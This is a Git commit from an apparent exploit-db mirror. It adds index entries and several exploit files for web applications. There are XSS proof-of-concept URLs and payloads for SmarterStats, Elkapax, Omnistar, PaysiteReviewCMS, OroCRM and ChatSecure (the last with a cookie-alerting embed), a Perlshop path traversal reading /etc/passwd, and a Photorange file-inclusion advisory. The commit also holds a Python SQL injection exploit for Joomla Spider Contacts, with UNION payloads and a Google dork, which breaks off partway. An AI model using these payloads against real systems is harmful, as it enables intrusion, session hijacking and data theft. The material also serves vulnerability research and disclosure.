bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 09_13_2014

Browse source
This commit is contained in:
Offensive Security 2014-09-13 04:43:42 +00:00
parent ad75a1324d
commit 58cf70abfb
13 changed files with 1192 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

12
files.csv
View file

@ -31167,3 +31167,15 @@ id,file,description,date,author,platform,type,port
34609,platforms/php/webapps/34609.txt,"MySource Matrix 'char_map.php' Multiple Cross Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
34614,platforms/asp/webapps/34614.txt,"SmarterTools SmarterStats 5.3.3819 'frmHelp.aspx' Cross Site Scripting Vulnerability",2010-09-09,"David Hoyt",asp,webapps,0
34616,platforms/php/webapps/34616.txt,"Elkagroup Elkapax 'q' Parameter Cross Site Scripting Vulnerability",2009-08-13,Isfahan,php,webapps,0
34617,platforms/php/webapps/34617.txt,"Waverider Systems Perlshop Multiple Input Validation Vulnerabilities",2009-08-06,Shadow,php,webapps,0
34618,platforms/php/webapps/34618.txt,"Omnistar Recruiting 'resume_register.php' Cross Site Scripting Vulnerability",2009-09-06,MizoZ,php,webapps,0
34619,platforms/php/webapps/34619.txt,"PaysiteReviewCMS 1.1 search.php q Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS image.php image Parameter XSS",2010-09-14,"Valentin Hoebel",php,webapps,0
34621,platforms/unix/remote/34621.c,"Mozilla Firefox <= 3.6.8 'Math.random()' Cross Domain Information Disclosure Vulnerability",2010-09-14,"Amit Klein",unix,remote,0
34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 Directory Traversal Vulnerability",2010-09-15,"Bogdan Calin",windows,remote,0
34624,platforms/php/webapps/34624.txt,"OroCRM - Stored XSS Vulnerability",2014-09-11,Provensec,php,webapps,80
34625,platforms/php/webapps/34625.py,"Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent XSS Vulnerability",2014-09-11,Vulnerability-Lab,ios,webapps,0

Can't render this file because it is too large.

9
platforms/asp/webapps/34614.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43110/info
SmarterTools SmarterStats is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
SmarterTools SmarterStats 5.3.3819 is vulnerable; other versions may also be affected.
https://www.example.com/UserControls/Popups/frmHelp.aspx?url='%22--%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E

462
platforms/ios/webapps/34626.txt Executable file
View file

@ -0,0 +1,462 @@
Document Title:
===============
Photorange v1.0 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1318
Release Date:
=============
2014-09-07
Vulnerability Laboratory ID (VL-ID):
====================================
1318
Common Vulnerability Scoring System:
====================================
6.3
Product & Service Introduction:
===============================
The BEST and MOST Convenient Private Photo & Video & Docs App! Photorange provides a secure Password System to keep your
secret files 100% private. Your files are ONLY stored on your device and we can never touch them.
( Copy of the Vendor Homepage: https://itunes.apple.com/en/app/photorange-schutz-privat-foto/id896041290 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory discovered a local file include web vulnerability in the official Photorange v1.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-09-08: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Jiajun Kuang
Product: Photorange - iOS Mobile Web Application 1.0
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Photorange v1.0 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or
system specific path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `add file` module. Remote attackers are able to inject own files with
malicious `filename` values in the `sync` device POST method request to compromise the mobile web-application. The local file/path include
execution occcurs in the file dir index web interface through the download path next to the vulnerable name/path value. The attacker is able
to inject the local file request by usage of the available `wifi interface` for file exchange via sync.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attack requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST via Sync.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.3. Exploitation of the local file include web vulnerability requires no privileged web-application user account but low
user interaction. Successful exploitation of the local file include web vulnerability results in mobile application or connected
device component compromise.
Request Method(s):
[+] [Sync] [POST]
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (Web Interface - http://localhost:9900/ )
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Exploit
http://localhost:9900/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT
http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT
PoC: Web Interface - Index Dir Listing
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>WiFi web access</title>
</head>?????<body><fontbase family="Arial,Verdana">
<style type="text/css">
a, div{
font-family: Arial,Verdana;
}
body {
background-color: silver;
position: relative;
height: 100%;
}
hr {
height: 1px;
border: none;
border-top: 1px solid #DDDDDD;
}
#content {
background-color: white;
border-style: dashed;
border-color: silver;
border-width: 1px;
position: absolute;
width: 98%;
left: 10px;
top: 10px;
z-index: 333;
}
.aImg {
margin-left: 10px;
margin-right: 10px;
margin-top: 20px;
border:none;
}
/*.aFod {
color: GrayText;
text-decoration: none;
width: 50px;
height: 50px;
}*/
#progress-bar-background {
width: 100%;
height: 100%;
/*background:silver url('/Web/left.ico') no-repeat;*/
background: silver;
position: absolute;
top:0;
pointer-events:none;
cursor: pointer;
}
#file-uploader-text {
width: 155px;
height: 30px;
text-align: center;
line-height: 30px;
cursor: pointer;
}
#file-uploader {
width: 155px;
height: 30px;
left: 18px;
position: absolute;
top: 0;
opacity: 0;
filter: alpha(opacity=0);
cursor: pointer;
}
#progress-bar-value {
width: 0%;
height: 100%;
background: #2B90D3;
}
.btnText {
width: 155px;
height: 30px;
text-align: center;
line-height: 30px;
cursor: pointer;
font-size: 13px;
text-align: center;
color: white;
}
#submit-link {
display: none;
position: absolute;
top: 7px;
left: 200px;
}
#stop-uploading-link {
display: none;
position: absolute;
top: 7px;
left: 200px;
}
</style>
<link href="/Web/uploadify/uploadify.css" rel="stylesheet" type="text/css" media="screen">
<script type="text/javascript" src="/Web/uploadify/jquery.min.js"></script>
<script type="text/javascript" src="/Web/uploadify/jquery.uploadify.js"></script>
<script language="javascript">
var currentFolderPath = '/';
var alertMessage = "null";
var actionType = "Show";
var submitting = false;
var tipHiddenTop = -200;
var tipShownTop = -80;
var lastShownTipDate;
if (alertMessage != "null") {
alert(alertMessage);
}
function tippable() {
var currentTop = document.getElementById("tip").style.top;
currentTop = currentTop.substring(0, currentTop.length-2);
currentTop = Number(currentTop);
var not = ((currentTop > tipHiddenTop) && (currentTop < tipShownTop))
return !not;
}
function hideTip() {
var tip = document.getElementById("tip");
tip.style.top = tipHiddenTop;
}
function showTip() {
var tip = document.getElementById("tip");
tip.style.top = tipShownTop;
lastShownTipDate = new Date();
setTimeout("if((new Date()).getTime()-lastShownTipDate.getTime()>=4900){hideTip();}", 5000);
}
function aClickHandler(tag) {
if (submitting) {
return;
}
if (actionType == "Show")
{
if (tag.className == "image") {
document.body.style.overflow = "hidden"; //??body??
var wrap = document.getElementById("wrap");
wrap.style.display = "block";
var src = "/" + actionType + tag.name;
wrap.innerHTML = "<iframe id='photo-viewer' src='" + src + "' style='position:absolute;width:100%;height:100%' frameborder='no' scrolling='no' allowtransparency='yes' />";
}
else {
if (!tippable()) {
return;
}
document.getElementById("tip").style.top = tipHiddenTop;
document.getElementById("tip-content").innerHTML = "Jetzt kann nur Bild im Browser gesehen werden.";
showTip();
}
}
else {
var download = "/" + actionType + tag.name;
location.href = download;
}
}
function dClickHandler(tag) {
if (submitting) {
return;
}
location.href = tag.name;
}
function removePhotoViewer()
{
var wrap = document.getElementById("wrap");
wrap.innerHTML = "";
wrap.style.display = "none";
document.body.style.overflow = "auto";
}
function setViewMode()
{
var switchBg = document.getElementById("switch-bg");
var __switch = document.getElementById("switch");
switchBg.style.backgroundColor = "silver";
__switch.style.backgroundColor = "#2B90D3";
}
function setDownloadMode()
{
var switchBg = document.getElementById("switch-bg");
var __switch = document.getElementById("switch");
switchBg.style.backgroundColor = "#2B90D3";
__switch.style.backgroundColor = "silver";
}
function switchMode() {
if (!tippable()) {
return;
}
var ifInDownloadMode = (actionType == "Download");
actionType = ifInDownloadMode ? "Show" : "Download";
var ifInDownloadModeNow = !ifInDownloadMode;
if (ifInDownloadModeNow)
{
setDownloadMode();
document.getElementById("tip").style.top = tipHiddenTop;
document.getElementById("tip-content").innerHTML = "Tipp: anklicken irgend ein Daumennagel zum Herunterladen";
showTip();
}
else {
setViewMode();
hideTip();
}
}
$(document).ready(function () {
$("#file-upload").uploadify({
height : 30,
swf : '/Web/uploadify/uploadify.swf',
uploader : 'upload.html',
width : 120,
onQueueComplete : function(queueData) {
location.reload();
},
buttonText : "?berliefern",
onUploadStart : function(file) {
$.post("/setCurrent"+currentFolderPath, {}, function(data){}, "json");
$.post("/ifReachTheLimit/"+file.name, {}, function(data){ $("#file-upload").uploadify('stop'); }, "json");
}
});
document.getElementById("file-upload").style.left = "15px";
});
</script>
<div id="tip" style="position:absolute; top:-200px; left:40%; z-index:2000">
<img style="" src="/Web/tip.png">
<div id="tip-content" style="position:absolute; left:0px; top:120px; z-index:2001; text-align:center; color:white; width:300px;">
Tip: how to do
</div>
</div>
<div id="content" onselectstart="return false;">
<a href="/logout.html" style="float:right; margin:10px;">outloggen</a>
<h1 style="margin-left:10px; font-weight:lighter;">WiFi web access</h1>
<div id="buttons" style="position:relative; left:10px; height:60px;">
<a href="/back.html" style="text-decoration:none; position:absolute; top:0; left:0;"><img src="/Web/back3.png" style="width:25px; height:25px; border:none; vertical-align:middle"> Oberverzeichnis [aktuell:/]</a>
<!--mode-->
<div id="switch-bg" style="width:250px; height:30px; background:silver no-repeat; position:absolute; right:20px; text-align:right; line-height:30px; color:#E9E3E3; cursor:hand; bottom:-30; right:30px; padding-right:5px;" onclick="switchMode();">
herunterladen
<div id="switch" style="position:absolute; top:0; left:0; width:50%; height:100%; background:#2B90D3 no-repeat; text-align:left; padding-left:5px">
durchlesen
</div>
</div>
<!--mode end-->
</div>
<!--buttons end-->
<div style="height: 30px; width: 120px; left: 15px;" class="uploadify" id="file-upload"><object style="position: absolute; z-index: 1;" id="SWFUpload_0" type="application/x-shockwave-flash" data="/Web/uploadify/uploadify.swf" class="swfupload" height="30" width="120"><param name="wmode" value="transparent"><param name="movie" value="/Web/uploadify/uploadify.swf"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><param name="flashvars" value="movieName=SWFUpload_0&uploadURL=%2Fupload.html&useQueryString=false&requeueOnError=false&httpSuccess=&assumeSuccessTimeout=30?ms=&filePostName=Filedata&fileTypes=*.*&fileTypesDescription=All%20Files&fileSizeLimit=0&fileUploadLimit=0&fileQueueLimit=999&debugEnabled=false&buttonImageURL=%2F&buttonWidth=120&buttonHeight=30&buttonText=&buttonTextTopPadding=0&buttonTextLeftPadding=0&buttonTextStyle=color%3A%20%23000000%3B%20font-size%3A%2016pt%3B&buttonAction=-110&buttonDisabled=false&buttonCursor=-2"></object><div style="height: 30px; line-height: 30px; width: 120px;" class="uploadify-button " id="file-upload-button"><span class="uploadify-button-text">?berliefern</span></div></div><div class="uploadify-queue" id="file-upload-queue"></div>
<hr>
<a href="#" name="/2.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/2_43698027.png" class="image" onclick="aClickHandler(this);"><img class="aImg" src="/2_43698027.png_THUMBNAIL" height="60px" width="60px"></a><a href="#" name="/>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT" class="document" onclick="aClickHandler(this);" style="position:relative; text-decoration:none;"><img class="aImg" style="" src="/Web/TXT0.png" height="60px" width="60px">?????<div class="name" style="position:absolute; top:1px !important; top:65px; height:17px; left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:18px;z-index:2000;">>"><./[LOCAL FILE INCLUDE VULNERABILITY!].TXT</div></a><br/><br/><br/>
</div>
<div id="wrap" style="background-color:black; top:0; left:0; width:100%; height:100%; position:absolute; z-index:1000; display:none;">
</div>
<!--wrap end-->
</body>
</html></iframe></div></a></div></fontbase></body></html>
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:9900/Download/%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[17] Mime Type[application/download]
Request Header:
Host[localhost:9900]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:9900/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[17]
Content-Disposition[attachment; filename=%3E%22%3E%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E.TXT]
Content-Type[application/download]
Date[Sat, 06 Sep 2014 00:13:00 GMT]
Reference(s): Links
http://localhost:9900/
http://localhost:9900/Download/
Solution - Fix & Patch:
=======================
The vulnerability can be pactehd by a secure parse and encode of the vulnerable filename value on sync or upload.
Filter and restrict the input to prevent further executions. Encode also the output name value listing in the index file dir module.
Security Risk:
==============
The security risk of the local file include web vulnerability in the filename value of the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

155
platforms/ios/webapps/34627.txt Executable file
View file

@ -0,0 +1,155 @@
Document Title:
===============
ChatSecure IM v2.2.4 iOS - Persistent Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1317
Release Date:
=============
2014-09-10
Vulnerability Laboratory ID (VL-ID):
====================================
1317
Common Vulnerability Scoring System:
====================================
5.9
Product & Service Introduction:
===============================
Free unlimited messaging with your friends over Facebook Chat, GChat & more! Works with iPhone, Mac, Linux or PC and
mobile devices. Secure Chat is an open source, encryption-capable chat program that Cypher Punks Off-the-Record protocol
used to protect a conversation about XMPP (Google Talk, Jabber, etc) or Oscar (AIM). Forking on Github!
( Copy of the Homepage: https://itunes.apple.com/de/app/chatsecure-verschlusselter/id464200063 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation web vulnerability in the ChatSecure IM v2.2.4 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-09-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Chris Ballinger
Product: ChatSecure IM - iOS Mobile Web Application 2.2.4
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the ChatSecure IM v2.2.4 iOS mobile web-application.
The vulnerability allows an attacker to inject own malicious script codes to the application-side of the chat im ios app.
The issue is located in the main message body context. During the tests we discovered that the chat message validation
impact a misconfiguration. In the message body context it is possible to inject persistent script code in splitted combination.
The attacker activates the chat interact with a victim and can send malicious messages that compromise the other device on
interaction. The validation parses script code tags but does not secure validate embed script codes with onload in object tags.
The security risk of the local persistent vulnerability in the chat message body is estimated as high with a cvss (common vulnerability
scoring system) count of 6.0. Exploitation of the application-side vulnerability requires no privileged app user account or user interaction.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects to malicious
source and persistent manipulation of affected or connected module context.
Request Method(s):
[+] [Bluetooth - Nearby Sync]
Vulnerable Module(s):
[+] Message Board Index
Vulnerable Parameter(s):
[+] message body context
Affected Module(s):
[+] Message Board Index - Chat Index
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with privileged application user account and without user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided steps and information below to continue.
1. Install the mobile application chat iOS app (https://itunes.apple.com/de/app/chatsecure-verschlusselter/id464200063)
2. Interact with an user account and inject the payload to the message body
3. The code executes at both sites of the user clients on the application-side of the service
4. Successful reproduce of the vulnerability!
PoC: Payload #1
<EMBED SRC="data:image/svg+xml;base64,JTIwPiI8PGlmcmFtZSBzcmM9aHR0cDovL3Z1bG4tbGFiLmNvbSBvbmxvYWQ9YWxlcnQoZG9jdW1lbnQuY29va2llKSA8" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of embed script codes in connection object tags.
Filter the message body and restrict the input to disallow special char injection with application-side attack vector.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the secure chat im is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

7
platforms/php/webapps/34616.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43131/info
Elkagroup Elkapax is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/?q=<script>alert(123)</script>&mode=2

7
platforms/php/webapps/34617.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43158/info
Perlshop is prone to multiple input-validation vulnerabilities including a nondescript input-validation vulnerability, multiple cross-site scripting vulnerabilities, and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, input arbitrary data to restricted parameters, and view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks.
http://www.example.cgi/cgi-bin/perlshop.cgi?ACTION=ENTER%20SHOP&thispage=../../../../../../../../etc/passwd&ORDER_ID=%21ORDERID%21&LANG=english&CUR=dollar

7
platforms/php/webapps/34618.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/43163/info
Omnistar Recruiting is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/users/resume_register.php?job2=%3E%3Cscript%3Ealert%281%29%3C/script%3E

9
platforms/php/webapps/34619.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43213/info
Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/search.php?q=[XSS]

9
platforms/php/webapps/34620.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43213/info
Mechanical Bunny Media PaysiteReviewCMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Mechanical Bunny Media PaysiteReviewCMS 1.1 is vulnerable; other versions may also be affected.
http://www.example.com/image.php?image=[XSS]

15
platforms/php/webapps/34624.txt Executable file
View file

@ -0,0 +1,15 @@
# Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing!
# Discovered by: Provensec
# Website: http://www.provensec.com
# Author: Provensec Labs
# Type of vulnerability: XSS Stored
# Description:
1 Goto http://server add a new lead fill all the fields properly but Fill the email filed with xss payload as given in the screenshot
http://prntscr.com/4lf043
payload used "><img src=d onerror=confirm(/provensec/);>
2 click save and close button
http://prntscr.com/4lf0ej

382
platforms/php/webapps/34625.py Executable file
View file

@ -0,0 +1,382 @@
#!/usr/bin/env python
#
#
# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://web-dorado.com/
#
# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60 (fixed)
# Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE (no fixed)
#
# Dork Google: inurl:option=com_spidercontacts
#
# Date : 2014-09-07
#
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
#
#
#
######################
#
# PoC Exploit:
#
# http://localhost/joomla/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
#
#
# "contacts_id" variables is not sanitized.
#
#
# Vulnerability Disclosure Timeline:
#
# 2014-09-07: Discovered vulnerability
# 2014-09-09: Vendor Notification
# 2014-09-10: Vendor Response/Feedback
# 2014-09-10: Vendor Fix/Patch
# 2014-09-10: Public Disclosure
import codecs
import httplib
import re
import sys
import socket
import optparse
banner = """
$$$$$\ $$\ $$$$$$\ $$\ $$\
\__$$ | $$ | $$ __$$\ \__| $$ |
$$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\
$$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\
$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__|
$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
\______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__|
$$ |
$$ |
\__|
$$$$$$\ $$\ $$\ $$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ | $$$$ | $$ ___$$\ $$ __$$\
$$ / \__| $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$$$$$$\ \_$$ | \_/ $$ | $$ / \__|
$$ | $$ __$$\ $$ __$$\\_$$ _| \____$$\ $$ _____|\_$$ _| $$ _____| $$ | $$$$$ / $$$$$$$\
$$ | $$ / $$ |$$ | $$ | $$ | $$$$$$$ |$$ / $$ | \$$$$$$\ $$ | \___$$\ $$ __$$\
$$ | $$\ $$ | $$ |$$ | $$ | $$ |$$\ $$ __$$ |$$ | $$ |$$\ \____$$\ $$ | $$\ $$ | $$ / $$ |
\$$$$$$ |\$$$$$$ |$$ | $$ | \$$$$ |\$$$$$$$ |\$$$$$$$\ \$$$$ |$$$$$$$ | $$$$$$\ $$\\$$$$$$ |$$\ $$$$$$ |
\______/ \______/ \__| \__| \____/ \_______| \_______| \____/ \_______/ \______|\__|\______/ \__|\______/
j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
C0mm4nds = dict()
C0mm4nds['DB VERS'] = 'VERSION'
C0mm4nds['DB NAME'] = 'DATABASE'
C0mm4nds['DB USER'] = 'CURRENT_USER'
def def_payload(payl):
payl = payl
return payl
def com_com_spidercalendar():
com_spidercalendar = "index.php?option=com_spidercontacts&contact_id="+payload+"&view=showcontact&lang=ca"
return com_spidercalendar
ver_spidercontacts = "administrator/components/com_spidercontacts/spidercontacts.xml"
vuln = 0
def cmdMySQL(cmd):
SqlInjList = [
# SQLi Spider Contacts 1.3.6
'1%20UNION%20ALL%20SELECT%20CONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Contacts 1.3.5 - 1.3.4
